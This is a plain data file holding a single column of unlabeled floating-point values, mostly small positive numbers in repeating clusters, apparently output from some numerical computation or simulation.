0.000346107
0.000350381
0.000346116
0.000350383
0.000346107
0.000346105
0.000346121
0.000350363
0.000350381
0.000350382
0.000346118
0.000346107
0.0003416
0.00033732
0.000341588
0.000341599
0.000337322
0.00034611
0.000341593
0.000341607
0.000337319
0.00033732
0.000341604
0.000341605
0.000337316
0.000346144
0.000350312
0.000350372
0.000346116
0.000350347
0.000346174
0.000346117
0.000346144
0.000350312
0.000350373
0.000346117
0.000350347
0.000346173
0.000346119
0.0003461
0.000350386
0.000350387
0.000350389
0.000346103
0.000346104
0.000341565
0.000337332
0.000341592
0.000337391
0.000341532
0.000341588
0.000337357
0.000341565
0.000337333
0.000341594
0.000337391
0.000341529
0.000341591
0.000337357
0.000306466
0.000306442
0.000302189
0.000302202
0.000306463
0.00030645
0.000302189
0.000310973
0.000315248
0.00031098
0.000315251
0.000310973
0.000310973
0.000310988
0.000315248
0.000315234
0.000315251
0.000310974
0.000310989
0.000306466
0.000302188
0.000306454
0.000306464
0.000302189
0.000310973
0.000306458
0.000306467
0.00030645
0.000302202
0.000302191
0.00030645
0.000306466
0.00030219
0.000310972
0.000315246
0.000310979
0.000315249
0.00031097
0.000310974
0.000310991
0.000315232
0.000315248
0.00031525
0.000310986
0.000310976
0.000306466
0.000302186
0.000306453
0.000306463
0.000302189
0.000310972
0.000306457
0.00030647
0.000302185
0.000302185
0.000306468
0.000306468
0.000302181
0.000311007
0.000315176
0.000315237
0.000310978
0.000315211
0.00031104
0.000310981
0.000311008
0.000315176
0.000315238
0.000310981
0.000315213
0.000311041
0.000310982
0.000310964
0.000315252
0.000315252
0.000315254
0.000310967
0.000310968
0.000306428
0.000302199
0.000306457
0.000302256
0.000306396
0.000306453
0.000302222
0.000306428
0.000302199
0.000306457
0.000302257
0.000306397
0.000306454
0.000302221
0.000271339
0.000271321
0.000267066
0.000267075
0.000271336
0.000271321
0.000267063
0.000275844
0.000280115
0.000275853
0.000280118
0.000275845
0.000275844
0.000275862
0.000280116
0.000280097
0.000280117
0.000275845
0.000275858
0.000271341
0.000267064
0.000271328
0.000271339
0.000267063
0.000275845
0.000271331
0.000271333
0.000271315
0.000267072
0.000267058
0.000271317
0.00027133
0.000267058
0.00027584
0.000280117
0.000275849
0.000280118
0.00027584
0.000275839
0.000275856
0.000280097
0.000280115
0.000280116
0.000275853
0.00027584
0.000271334
0.000267056
0.000271321
0.000271331
0.000267057
0.000275842
0.000271326
0.000271341
0.000267056
0.000267056
0.000271339
0.000271339
0.000267052
0.000275879
0.000280045
0.000280108
0.000275851
0.000280081
0.00027591
0.000275852
0.00027588
0.000280047
0.000280106
0.00027585
0.000280082
0.000275914
0.000275852
0.000275834
0.000280122
0.000280121
0.000280123
0.000275838
0.000275838
0.0002713
0.00026707
0.000271328
0.000267128
0.000271267
0.000271324
0.000267094
0.000271301
0.000267071
0.000271329
0.00026713
0.000271271
0.000271325
0.000267096
0.000236213
0.000236193
0.000231941
0.000231953
0.000236211
0.000236196
0.00023194
0.000240717
0.000244991
0.000240726
0.000244995
0.000240719
0.000240718
0.000240735
0.00024499
0.000244975
0.000244992
0.00024072
0.000240735
0.000236215
0.000231938
0.000236201
0.000236211
0.000231938
0.000240722
0.000236207
0.000236207
0.000236192
0.000231949
0.000231936
0.00023619
0.000236207
0.000231933
0.000240712
0.000244986
0.000240725
0.000244989
0.000240715
0.000240713
0.000240733
0.00024497
0.00024499
0.000244988
0.00024073
0.000240718
0.000236209
0.000231933
0.000236198
0.000236206
0.000231932
0.000240717
0.000236204
0.000236215
0.000231929
0.000231927
0.000236213
0.000236211
0.000231925
0.000240752
0.000244917
0.000244978
0.000240725
0.00024495
0.000240784
0.000240725
0.000240751
0.000244915
0.000244978
0.000240721
0.00024495
0.000240781
0.000240724
0.000240708
0.000244993
0.000244993
0.000244995
0.000240711
0.00024071
0.000236173
0.000231943
0.000236203
0.000232002
0.000236138
0.000236199
0.000231968
0.000236171
0.000231941
0.000236197
0.000231998
0.000236136
0.000236196
0.000231967
0.000201085
0.000201067
0.00019681
0.000196825
0.000201083
0.000201069
0.000196808
0.000205589
0.00020986
0.000205597
0.000209868
0.000205592
0.000205594
0.000205613
0.000209867
0.000209846
0.000209867
0.000205597
0.000205611
0.000201087
0.000196806
0.000201069
0.00020108
0.000196803
0.000205593
0.000201079
0.000201083
0.000201063
0.000196827
0.000196805
0.000201068
0.000201078
0.000196807
0.000205587
0.000209859
0.000205598
0.000209864
0.000205591
0.000205589
0.000205607
0.000209843
0.000209862
0.000209861
0.00020561
0.000205591
0.000201086
0.00019681
0.000201072
0.000201082
0.000196805
0.000205586
0.000201072
0.000201082
0.000196796
0.000196795
0.000201081
0.00020108
0.000196793
0.000205624
0.000209789
0.000209849
0.000205596
0.000209822
0.000205658
0.000205595
0.000205623
0.000209785
0.000209849
0.000205594
0.000209822
0.000205654
0.000205595
0.000205578
0.000209864
0.000209863
0.000209865
0.00020558
0.00020558
0.00020104
0.000196812
0.00020107
0.000196872
0.00020101
0.000201066
0.000196835
0.000201039
0.00019681
0.000201068
0.000196869
0.000201006
0.000201065
0.000196835
0.000165947
0.000165929
0.00016167
0.000161691
0.000165942
0.000165926
0.00016167
0.000170448
0.000174721
0.000170461
0.000174732
0.000170457
0.000170455
0.000170474
0.000174728
0.000174707
0.000174727
0.000170457
0.000170478
0.000165951
0.000161668
0.00016593
0.000165941
0.00016166
0.000170452
0.00016594
0.000165941
0.000165926
0.000161683
0.000161668
0.000165919
0.00016594
0.000161664
0.000170445
0.000174718
0.000170457
0.000174729
0.000170452
0.000170451
0.00017047
0.0001747
0.000174724
0.000174725
0.000170471
0.000170454
0.000165947
0.000161665
0.000165926
0.000165937
0.000161658
0.000170447
0.000165936
0.000165943
0.000161656
0.000161657
0.000165942
0.000165943
0.000161655
0.00017049
0.000174651
0.000174713
0.000170459
0.000174685
0.000170524
0.000170457
0.000170489
0.000174648
0.000174714
0.000170459
0.000174683
0.00017052
0.000170459
0.000170442
0.000174729
0.000174729
0.00017473
0.000170442
0.000170442
0.000165902
0.000161672
0.000165928
0.000161735
0.000165873
0.000165926
0.0001617
0.000165903
0.000161674
0.00016593
0.000161734
0.000165871
0.000165928
0.000161701
0.000130794
0.000130779
0.000126522
0.000126546
0.000130792
0.000130764
0.000126518
0.000135293
0.000139569
0.000135315
0.000139588
0.000135309
0.000135307
0.000135322
0.000139578
0.000139551
0.00013958
0.00013531
0.000135337
0.000130806
0.000126521
0.000130778
0.000130786
0.000126503
0.0001353
0.000130797
0.000130794
0.00013078
0.000126546
0.000126522
0.000130765
0.000130792
0.000126517
0.000135294
0.000139572
0.000135315
0.00013959
0.00013531
0.000135307
0.000135324
0.000139552
0.000139582
0.000139581
0.000135335
0.000135313
0.000130806
0.000126519
0.000130778
0.000130787
0.000126502
0.000135298
0.000130796
0.0001308
0.000126508
0.000126508
0.000130801
0.000130801
0.000126509
0.00013535
0.000139506
0.000139571
0.000135318
0.000139541
0.000135379
0.000135315
0.000135349
0.000139507
0.000139569
0.000135318
0.00013954
0.00013538
0.000135314
0.000135299
0.000139587
0.000139587
0.000139586
0.000135297
0.000135297
0.000130759
0.000126527
0.000130784
0.000126586
0.000130728
0.000130785
0.000126557
0.000130758
0.000126525
0.000130783
0.000126588
0.000130729
0.000130783
0.000126555
9.56313e-05
9.5622e-05
9.13598e-05
9.14075e-05
9.56266e-05
9.55817e-05
9.13528e-05
0.000100121
0.000104415
0.000100164
0.000104448
0.000100154
0.000100151
0.000100163
0.000104425
0.000104382
0.000104426
0.000100161
0.000100199
9.56631e-05
9.13558e-05
9.56146e-05
9.56247e-05
9.13173e-05
0.000100121
9.56504e-05
9.56325e-05
9.56238e-05
9.1408e-05
9.13626e-05
9.55816e-05
9.5628e-05
9.13546e-05
0.00010012
0.000104412
0.000100162
0.000104446
0.000100152
0.00010015
0.000100164
0.000104377
0.000104422
0.000104423
0.000100196
0.000100159
9.56632e-05
9.13563e-05
9.56139e-05
9.56248e-05
9.13182e-05
0.000100121
9.56512e-05
9.56322e-05
9.13259e-05
9.13265e-05
9.5637e-05
9.56375e-05
9.13304e-05
0.000100181
0.000104342
0.000104406
0.000100149
0.000104371
0.00010021
0.000100142
0.000100182
0.000104343
0.000104407
0.00010015
0.000104372
0.00010021
0.000100143
0.000100127
0.000104427
0.000104427
0.000104422
0.000100121
0.000100122
9.55845e-05
9.13505e-05
9.56134e-05
9.1405e-05
9.55669e-05
9.56159e-05
9.13802e-05
9.5585e-05
9.13521e-05
9.56146e-05
9.14052e-05
9.55672e-05
9.56171e-05
9.13791e-05
6.04478e-05
6.04374e-05
5.61974e-05
5.63083e-05
6.04287e-05
6.03232e-05
5.61672e-05
6.4881e-05
6.92319e-05
6.49912e-05
6.93209e-05
6.49758e-05
6.49727e-05
6.49823e-05
6.92318e-05
6.91395e-05
6.92411e-05
6.4994e-05
6.50848e-05
6.05614e-05
5.61803e-05
6.04245e-05
6.04383e-05
5.60448e-05
6.4879e-05
6.05258e-05
6.04526e-05
6.0443e-05
5.63117e-05
5.62007e-05
6.03275e-05
6.04334e-05
5.61711e-05
6.48848e-05
6.92365e-05
6.49942e-05
6.93246e-05
6.49793e-05
6.49776e-05
6.49872e-05
6.91447e-05
6.92362e-05
6.92463e-05
6.50883e-05
6.49991e-05
6.05658e-05
5.61832e-05
6.04278e-05
6.04433e-05
5.60488e-05
6.4884e-05
6.05474e-05
6.04662e-05
5.61056e-05
5.61055e-05
6.0483e-05
6.04834e-05
5.61264e-05
6.50069e-05
6.9175e-05
6.92342e-05
6.49825e-05
6.91833e-05
6.50048e-05
6.49552e-05
6.50067e-05
6.91772e-05
6.92344e-05
6.49836e-05
6.9184e-05
6.5002e-05
6.49555e-05
6.4934e-05
6.92669e-05
6.92669e-05
6.92528e-05
6.49185e-05
6.49184e-05
6.04017e-05
5.61583e-05
6.04151e-05
5.61818e-05
6.04247e-05
6.04428e-05
5.62e-05
6.04023e-05
5.61588e-05
6.0417e-05
5.61786e-05
6.04233e-05
6.04442e-05
5.62002e-05
2.49166e-05
2.49478e-05
2.06182e-05
2.10611e-05
2.47391e-05
2.44736e-05
2.02202e-05
2.90848e-05
3.38425e-05
2.95919e-05
3.43606e-05
2.97256e-05
2.95539e-05
2.97012e-05
3.38612e-05
3.36449e-05
3.39554e-05
2.97101e-05
3.00437e-05
2.55946e-05
2.06445e-05
2.4718e-05
2.46237e-05
1.9416e-05
2.90068e-05
2.53934e-05
2.49127e-05
2.49398e-05
2.10544e-05
2.06078e-05
2.44675e-05
2.47324e-05
2.02117e-05
2.90748e-05
3.38389e-05
2.95891e-05
3.43582e-05
2.97189e-05
2.95491e-05
2.96976e-05
3.36407e-05
3.38637e-05
3.39538e-05
3.00387e-05
2.971e-05
2.559e-05
2.06396e-05
2.47078e-05
2.46188e-05
1.94148e-05
2.89918e-05
2.53857e-05
2.46479e-05
1.9513e-05
1.95135e-05
2.48876e-05
2.48813e-05
1.9962e-05
2.96119e-05
3.39022e-05
3.38373e-05
2.9665e-05
3.37767e-05
2.96039e-05
2.94421e-05
2.96112e-05
3.39036e-05
3.38437e-05
2.96661e-05
3.37788e-05
2.96046e-05
2.9446e-05
2.93931e-05
3.39862e-05
3.39941e-05
3.38664e-05
2.91943e-05
2.91976e-05
2.46331e-05
2.0048e-05
2.44832e-05
2.05163e-05
2.49081e-05
2.46283e-05
2.03927e-05
2.46319e-05
2.00451e-05
2.4479e-05
2.05147e-05
2.49069e-05
2.46251e-05
2.03905e-05
7.8288e-06
3.55572e-06
8.69783e-06
2.26829e-06
3.68352e-05
9.30311e-06
-2.06065e-07
2.62214e-05
-1.38741e-06
1.48341e-05
1.68479e-05
3.14538e-06
1.75828e-06
1.96942e-07
1.17703e-05
1.009e-05
5.05549e-06
4.9154e-07
3.76691e-06
7.17487e-06
1.18195e-05
-1.01602e-06
7.80627e-06
3.56998e-06
2.27728e-06
8.6682e-06
9.32573e-06
3.68832e-05
-2.19232e-07
2.62419e-05
-1.44944e-06
1.48475e-05
1.68678e-05
3.16057e-06
1.79895e-07
1.72133e-06
1.17381e-05
5.06208e-06
1.01043e-05
4.95141e-07
3.77567e-06
7.19643e-06
4.28792e-06
3.97487e-06
2.60033e-06
2.59845e-06
4.10457e-06
4.10305e-06
2.94409e-06
3.61724e-06
7.49832e-06
3.52261e-06
3.52072e-06
5.24782e-06
5.24644e-06
1.20098e-06
3.97543e-06
1.95691e-06
4.32307e-06
4.05531e-06
4.90078e-06
3.67134e-06
2.38746e-06
3.97554e-06
1.95648e-06
4.32222e-06
4.05591e-06
4.89941e-06
3.671e-06
2.38908e-06
5.39057e-06
4.1503e-06
4.91664e-06
1.97157e-06
6.37622e-06
4.65532e-06
1.31619e-06
5.72018e-06
4.14832e-06
2.9667e-06
5.49888e-07
7.27776e-06
2.20414e-06
3.19174e-06
4.87149e-06
5.97803e-06
1.13277e-05
3.4531e-06
5.14987e-06
7.42249e-06
1.67246e-07
8.08072e-06
5.32698e-06
3.25736e-06
1.91965e-06
3.94063e-06
7.30194e-06
6.5299e-06
1.18348e-05
-9.92077e-07
5.38973e-06
4.15725e-06
1.98095e-06
4.911e-06
4.65658e-06
6.37563e-06
1.31891e-06
5.71639e-06
4.14861e-06
5.45002e-07
2.96643e-06
2.19682e-06
7.27935e-06
3.18887e-06
8.07725e-06
5.32304e-06
3.25914e-06
1.92137e-06
3.94026e-06
7.29915e-06
6.52814e-06
4.86839e-06
5.98132e-06
1.13331e-05
3.453e-06
5.14348e-06
7.42059e-06
1.66051e-07
3.14655e-06
1.15927e-05
1.16525e-05
1.30581e-05
1.3074e-05
-1.22978e-07
6.72421e-06
2.98688e-06
2.1864e-06
6.49373e-06
2.1814e-06
6.74725e-06
1.64562e-05
6.72052e-06
2.98348e-06
2.19539e-06
6.50007e-06
2.17922e-06
6.75343e-06
1.64583e-05
3.48708e-06
3.7943e-06
5.12862e-08
4.89577e-08
4.48394e-06
4.48641e-06
3.90634e-06
6.72835e-06
2.51385e-06
2.52064e-06
1.83884e-06
3.64915e-05
3.64267e-05
7.52316e-06
9.45869e-06
7.70756e-06
-4.90813e-06
6.39191e-06
2.08383e-05
1.71176e-06
7.51761e-06
9.47443e-06
7.71153e-06
-4.91707e-06
6.39241e-06
2.08538e-05
1.70645e-06
0.000732527
0.000728012
0.000732528
0.000728012
0.000728023
0.000723738
0.000723738
0.00072802
0.00072802
0.000723734
0.000732558
0.00073673
0.000736788
0.000732529
0.000736762
0.000732531
0.000732595
0.00073256
0.000736729
0.00073679
0.000732532
0.000736764
0.000732533
0.000732593
0.000732514
0.000736802
0.000736803
0.000736806
0.000732517
0.000732518
0.000727977
0.000723751
0.000728008
0.000723801
0.000728005
0.000723771
0.000727944
0.000727978
0.000723752
0.000728009
0.0007238
0.000728007
0.000723772
0.000727943
0.000710459
0.000714969
0.000710455
0.000714963
0.000714956
0.000719241
0.00071924
0.000719244
0.000714959
0.000714958
0.00071043
0.000706259
0.000710457
0.000706199
0.000710452
0.000710397
0.000706225
0.000710428
0.000706257
0.000710453
0.000706198
0.00071045
0.000710396
0.000706224
0.000715002
0.000719227
0.000719166
0.000714973
0.0007192
0.000714975
0.000715038
0.000714999
0.000719226
0.000719163
0.000714968
0.0007192
0.000714972
0.000715037
0.000710468
0.000706185
0.000706184
0.000710465
0.000710464
0.000706182
0.000728023
0.000728003
0.000723747
0.000723758
0.00072802
0.000728006
0.000723747
0.000732527
0.000736804
0.000732533
0.000736805
0.000732526
0.000732527
0.000732547
0.000736802
0.000736789
0.000732528
0.000736804
0.000732542
0.000728022
0.000723744
0.000728008
0.00072802
0.000723747
0.000714965
0.000719237
0.000719222
0.000714984
0.000719238
0.000714968
0.000714981
0.000710464
0.000710454
0.00070619
0.000706192
0.000710462
0.000714965
0.00071924
0.000714974
0.00071924
0.000714966
0.000710464
0.000710448
0.000706193
0.000706207
0.000706192
0.000710462
0.00071045
0.000714969
0.000719239
0.000719226
0.000714984
0.000719243
0.000714969
0.000714984
0.000710467
0.000710456
0.000706192
0.000710466
0.000706193
0.00071497
0.000719241
0.000714979
0.000719243
0.00071497
0.000710466
0.000710446
0.000706192
0.000706204
0.000710463
0.000710452
0.00070619
0.000728026
0.00072374
0.00072374
0.000728022
0.000728024
0.000723736
0.000732562
0.000736731
0.000736791
0.00073253
0.000732533
0.000736766
0.000732597
0.000732566
0.000736734
0.000736792
0.000732536
0.0007326
0.000736767
0.000732537
0.000732518
0.000736805
0.000736806
0.00073252
0.000736809
0.000732521
0.000727981
0.000723753
0.000728009
0.000723804
0.000728007
0.000727946
0.000723775
0.000727984
0.000723754
0.000728013
0.000723804
0.000727949
0.00072801
0.000723774
0.00073253
0.000728016
0.00071046
0.000714973
0.000714961
0.000719243
0.000719244
0.000719246
0.000714963
0.000714963
0.000710431
0.000706263
0.000710458
0.000706201
0.0007104
0.000710455
0.000706228
0.000710431
0.000706261
0.000710458
0.000706203
0.000710456
0.000710398
0.000706228
0.000715006
0.000719229
0.000719167
0.000714976
0.00071504
0.000719204
0.000714979
0.000715006
0.00071923
0.000719167
0.000714976
0.000719203
0.000714978
0.00071504
0.000710473
0.000706187
0.000706188
0.000710469
0.000710469
0.000706185
0.000710461
0.000714971
0.000728019
0.000728002
0.000723743
0.000723757
0.000728018
0.000728006
0.000723742
0.000732523
0.000736801
0.000732532
0.000736801
0.000732525
0.000732523
0.000732544
0.000736801
0.000736787
0.000732526
0.000736801
0.000732542
0.000728019
0.000723742
0.000728007
0.000728019
0.000723743
0.000714961
0.000719218
0.000719231
0.000714983
0.000719234
0.000714977
0.000714963
0.000710459
0.000710449
0.000706185
0.000706185
0.000710459
0.000714961
0.000719234
0.000714969
0.000719235
0.00071496
0.000710458
0.000710445
0.000706198
0.000706185
0.000706183
0.000710444
0.000710457
0.000714962
0.000719232
0.000719219
0.00071498
0.000719235
0.000714963
0.000714978
0.000710461
0.000710449
0.000706186
0.00071046
0.000706187
0.000714963
0.000719236
0.000714971
0.000719237
0.000714963
0.00071046
0.000710442
0.000706186
0.000706201
0.000710457
0.000710445
0.000706185
0.000728023
0.000727998
0.000723756
0.000723747
0.000728006
0.00072802
0.000723746
0.000732527
0.000736804
0.000732534
0.000732525
0.000736806
0.000732528
0.000732547
0.000736791
0.000736805
0.000732544
0.000736806
0.00073253
0.000728023
0.000723743
0.00072801
0.000728021
0.000723746
0.000728023
0.000727998
0.000723747
0.000723757
0.000728019
0.000728006
0.000723747
0.000728025
0.000723747
0.00072801
0.000728024
0.000723749
0.00071497
0.000719223
0.00071924
0.000714988
0.000719241
0.000714984
0.000714972
0.000710469
0.000710456
0.000706195
0.000710467
0.000706196
0.000714969
0.000719238
0.000714975
0.00071924
0.000714967
0.000710469
0.000710453
0.000706212
0.000706199
0.000710454
0.000710468
0.000706196
0.00071497
0.000719239
0.000719224
0.000714984
0.000719242
0.000714971
0.000714984
0.000710468
0.000710456
0.000706193
0.000710465
0.000706195
0.000714969
0.000719241
0.000714978
0.000719243
0.000714967
0.00071047
0.000710449
0.000706197
0.000706209
0.000710467
0.000710454
0.000706196
0.000728022
0.000723737
0.000723738
0.000728019
0.000728021
0.000723732
0.000732559
0.000736729
0.000736789
0.00073253
0.000732532
0.000736764
0.000732594
0.000732561
0.000736732
0.000736792
0.000732534
0.000732596
0.000736767
0.000732535
0.000732516
0.000736803
0.000736805
0.000732518
0.000736807
0.00073252
0.000727977
0.00072375
0.000728006
0.0007238
0.000728004
0.000727942
0.00072377
0.000727979
0.000723751
0.000728011
0.000723802
0.000727945
0.000728007
0.000723771
0.00073253
0.000728015
0.000710454
0.000714965
0.000714957
0.00071924
0.000719241
0.000719243
0.000714959
0.000714959
0.000710427
0.000706256
0.000710452
0.000706196
0.000710393
0.00071045
0.000706224
0.000710427
0.000706259
0.000710454
0.000706197
0.00071045
0.000710397
0.000706223
0.000715
0.000719226
0.000719161
0.000714971
0.000715034
0.000719197
0.000714974
0.000715001
0.000719226
0.000719164
0.000714972
0.000719198
0.000714974
0.000715037
0.000710468
0.000706182
0.000706183
0.000710463
0.000710464
0.000706179
0.000710458
0.000714969
0.000728027
0.00072801
0.000723761
0.000723753
0.000728012
0.000728027
0.00072375
0.000732532
0.000736809
0.000732537
0.000732532
0.00073681
0.000732532
0.000732554
0.000736792
0.000736808
0.000732548
0.000736809
0.000732535
0.000728027
0.000723746
0.000728011
0.000728025
0.00072375
0.000728029
0.00072801
0.000723763
0.000723752
0.000728011
0.000728026
0.000723752
0.000732533
0.000736809
0.000736811
0.000732533
0.000732534
0.000732556
0.000736795
0.000736809
0.00073681
0.00073255
0.000732536
0.000728028
0.00072375
0.000728012
0.000728025
0.000723752
0.000714969
0.000719223
0.000719242
0.000714988
0.000719242
0.000714981
0.000714972
0.000710467
0.000710454
0.00070619
0.000710466
0.000706193
0.000714968
0.00071924
0.000714974
0.000719242
0.000714966
0.000710468
0.00071045
0.000706206
0.000706195
0.00071045
0.000710466
0.000706195
0.000714972
0.000719229
0.000719241
0.000714992
0.000719246
0.00071499
0.000714972
0.000710469
0.00071046
0.000706194
0.000710469
0.000706194
0.000714972
0.000719246
0.000714982
0.000719247
0.000714973
0.000710469
0.000710452
0.000706208
0.000706195
0.000710457
0.000710466
0.000706195
0.000728015
0.000728017
0.000714963
0.000719246
0.000719247
0.00071925
0.000714966
0.000714966
0.000710434
0.000706263
0.00071046
0.000706203
0.000706229
0.0007104
0.000710457
0.000710434
0.000706263
0.000710462
0.000706205
0.000706229
0.000710402
0.000710458
0.000715007
0.000719232
0.00071917
0.000714977
0.000719204
0.000715041
0.00071498
0.000715009
0.000719233
0.000719173
0.00071498
0.000719207
0.000715045
0.000714982
0.000710475
0.000706189
0.00070619
0.000706187
0.000710471
0.000710472
0.000710461
0.000714973
0.000710464
0.000714976
0.000697415
0.000692902
0.000697415
0.000692902
0.000692912
0.000688628
0.000688628
0.000692909
0.00069291
0.000688624
0.000697446
0.000701615
0.000701675
0.000697418
0.000701649
0.00069742
0.00069748
0.000697446
0.000701614
0.000701674
0.000697419
0.000701649
0.000697421
0.000697478
0.000697403
0.000701689
0.000701688
0.000701692
0.000697406
0.000697407
0.00069287
0.000688642
0.000692899
0.000688702
0.000692895
0.000688667
0.00069284
0.00069287
0.000688642
0.0006929
0.000688703
0.000692896
0.000688668
0.000692838
0.000675344
0.000679858
0.000675343
0.000679857
0.000679847
0.000684133
0.000684132
0.000684136
0.00067985
0.00067985
0.000675316
0.000671142
0.000675343
0.000671085
0.000675339
0.000675282
0.00067111
0.000675314
0.000671142
0.000675342
0.000671083
0.000675338
0.000675281
0.000671109
0.000679892
0.000684119
0.000684057
0.000679863
0.000684093
0.000679865
0.000679923
0.000679891
0.000684118
0.000684059
0.000679861
0.000684094
0.000679864
0.000679924
0.000675356
0.00067107
0.000671069
0.000675352
0.000675352
0.000671066
0.000692909
0.000692894
0.000688638
0.000688648
0.000692909
0.000692894
0.000688635
0.000697413
0.000701688
0.000697422
0.000701688
0.000697411
0.000697411
0.000697436
0.000701686
0.000701668
0.000697416
0.000701684
0.000697427
0.00069291
0.000688633
0.000692898
0.000692908
0.000688636
0.000679856
0.00068413
0.000684112
0.000679874
0.000684131
0.000679859
0.000679868
0.000675351
0.00067534
0.000671076
0.000671076
0.000675351
0.000679854
0.000684128
0.000679864
0.000684129
0.000679855
0.000675353
0.000675332
0.000671078
0.00067109
0.000671077
0.00067535
0.000675336
0.000679857
0.000684131
0.000684116
0.000679875
0.000684131
0.000679859
0.000679872
0.000675355
0.000675342
0.000671077
0.000675353
0.000671079
0.000679857
0.00068413
0.000679865
0.000684132
0.000679856
0.000675354
0.000675335
0.000671079
0.000671093
0.000675351
0.000675339
0.000671079
0.000692915
0.000688629
0.00068863
0.000692912
0.000692913
0.000688627
0.000697449
0.000701617
0.000701679
0.000697421
0.000697424
0.000701653
0.000697482
0.000697449
0.000701617
0.000701679
0.000697423
0.000697481
0.000701654
0.000697424
0.000697406
0.000701692
0.000701693
0.000697409
0.000701695
0.00069741
0.000692873
0.000688644
0.000692901
0.000688704
0.000692897
0.000692842
0.000688668
0.000692873
0.000688643
0.000692902
0.000688703
0.000692839
0.000692899
0.000688668
0.00069742
0.000692905
0.000675347
0.000679859
0.000679848
0.000684133
0.000684132
0.000684136
0.000679851
0.000679851
0.000675316
0.000671144
0.000675344
0.000671086
0.000675283
0.000675341
0.000671111
0.000675316
0.000671146
0.000675344
0.000671085
0.00067534
0.000675284
0.000671111
0.000679893
0.00068412
0.000684057
0.000679863
0.000679925
0.000684093
0.000679865
0.000679892
0.000684118
0.000684059
0.000679863
0.000684092
0.000679865
0.000679926
0.000675358
0.000671071
0.000671071
0.000675354
0.000675354
0.000671068
0.000675346
0.000679858
0.000692903
0.000692889
0.000688632
0.000688643
0.000692902
0.000692888
0.00068863
0.000697407
0.00070168
0.000697419
0.000701682
0.000697407
0.000697405
0.000697427
0.000701679
0.000701665
0.000697408
0.000701679
0.00069742
0.000692906
0.00068863
0.000692895
0.000692904
0.000688632
0.000679853
0.000684112
0.000684126
0.000679869
0.000684126
0.000679869
0.000679855
0.00067535
0.000675339
0.000671075
0.000671075
0.000675351
0.000679853
0.000684126
0.000679862
0.000684126
0.000679853
0.00067535
0.000675331
0.00067109
0.000671076
0.000671075
0.000675337
0.000675348
0.000679852
0.000684126
0.000684109
0.00067987
0.000684126
0.000679855
0.000679866
0.00067535
0.000675338
0.000671074
0.000675349
0.000671075
0.000679852
0.000684126
0.000679862
0.000684127
0.000679853
0.000675349
0.000675332
0.000671078
0.000671088
0.000675348
0.000675333
0.000671076
0.000692912
0.000692895
0.000688649
0.000688639
0.000692897
0.000692911
0.000688636
0.000697417
0.000701692
0.000697426
0.000697416
0.000701693
0.000697416
0.000697436
0.000701677
0.000701692
0.000697431
0.000701691
0.000697419
0.000692912
0.000688633
0.000692899
0.00069291
0.000688636
0.000692912
0.000692896
0.000688641
0.00068865
0.000692912
0.000692895
0.000688638
0.000697414
0.000701688
0.000697421
0.000701691
0.000697412
0.000697415
0.000697437
0.000701692
0.000701672
0.000701691
0.00069742
0.000697428
0.000692911
0.000688634
0.000692899
0.000692909
0.000688636
0.000679855
0.000684114
0.000684132
0.000679869
0.000684131
0.000679867
0.000679859
0.000675353
0.000675341
0.000671078
0.000675351
0.000671079
0.000679855
0.000684128
0.000679864
0.00068413
0.000679854
0.000675352
0.00067533
0.000671091
0.00067108
0.000675334
0.00067535
0.000671079
0.000679857
0.000684133
0.000684117
0.000679871
0.000684133
0.000679859
0.00067987
0.000675352
0.000675342
0.000671078
0.000675353
0.000671079
0.000679856
0.00068413
0.000679865
0.000684132
0.000679856
0.000675352
0.000675331
0.000671079
0.00067109
0.00067535
0.000675335
0.000671079
0.000692912
0.000688627
0.000688627
0.000692908
0.00069291
0.000688624
0.000697444
0.000701612
0.000701672
0.000697416
0.000697419
0.000701647
0.000697477
0.000697447
0.000701614
0.000701675
0.000697421
0.000697477
0.000701648
0.000697423
0.000697403
0.000701687
0.000701688
0.000697405
0.000701691
0.000697407
0.000692868
0.000688641
0.000692897
0.000688699
0.000692894
0.000692836
0.000688666
0.000692871
0.000688641
0.000692902
0.0006887
0.000692836
0.000692896
0.000688667
0.000697416
0.000692903
0.000675342
0.000679856
0.000679845
0.000684131
0.000684132
0.000684135
0.000679848
0.000679848
0.000675311
0.000671141
0.00067534
0.00067108
0.00067528
0.000675335
0.000671106
0.000675312
0.000671142
0.000675341
0.000671083
0.000675336
0.000675282
0.000671107
0.00067989
0.000684118
0.000684053
0.000679861
0.000679921
0.000684093
0.000679862
0.00067989
0.000684117
0.000684054
0.00067986
0.000684092
0.000679862
0.000679922
0.000675352
0.000671067
0.000671068
0.000675349
0.00067535
0.000671064
0.000675344
0.000679857
0.00069291
0.00069289
0.000688648
0.000688637
0.000692893
0.000692908
0.000688635
0.000697412
0.000701685
0.00069742
0.00069741
0.000701687
0.000697413
0.000697431
0.00070167
0.000701688
0.000697427
0.000701689
0.000697416
0.000692909
0.000688632
0.000692898
0.000692907
0.000688634
0.000692912
0.000692889
0.000688648
0.000688636
0.000692894
0.000692908
0.000688636
0.000697415
0.000701687
0.000697424
0.000701689
0.000697414
0.000697415
0.000697429
0.000701671
0.000701688
0.000701688
0.000697428
0.000697416
0.000692911
0.000688633
0.000692899
0.000692908
0.000688635
0.000679853
0.000684111
0.000684128
0.000679872
0.000684129
0.000679869
0.000679858
0.000675351
0.00067534
0.000671076
0.000675351
0.000671077
0.000679853
0.000684127
0.000679862
0.000684128
0.000679853
0.00067535
0.000675334
0.000671093
0.000671081
0.000675336
0.00067535
0.000671078
0.000679858
0.000684114
0.000684129
0.000679874
0.000684131
0.000679872
0.000679859
0.000675354
0.000675342
0.000671077
0.000675353
0.000671078
0.000679857
0.000684129
0.000679865
0.000684132
0.000679857
0.000675354
0.000675335
0.000671092
0.000671081
0.000675339
0.000675352
0.000671079
0.000697417
0.000692903
0.00069742
0.000692904
0.00067985
0.000684135
0.000684135
0.000684139
0.000679853
0.000679853
0.000675318
0.000671146
0.000675345
0.000671087
0.000671114
0.000675284
0.000675341
0.000675317
0.000671146
0.000675344
0.000671085
0.000671113
0.000675284
0.000675341
0.000679894
0.00068412
0.000684059
0.000679863
0.000684096
0.000679925
0.000679867
0.000679894
0.000684121
0.000684059
0.000679864
0.000684097
0.000679925
0.000679867
0.000675359
0.000671073
0.000671072
0.000671069
0.000675356
0.000675355
0.000675347
0.00067986
0.000675346
0.000679861
0.000662299
0.000657787
0.000662297
0.000657786
0.000657796
0.000653513
0.000653513
0.000657793
0.000657793
0.00065351
0.00066233
0.000666497
0.00066656
0.000662302
0.000666534
0.000662304
0.000662362
0.000662329
0.000666497
0.000666557
0.0006623
0.000666533
0.000662303
0.000662362
0.000662285
0.000666573
0.000666572
0.000666576
0.000662289
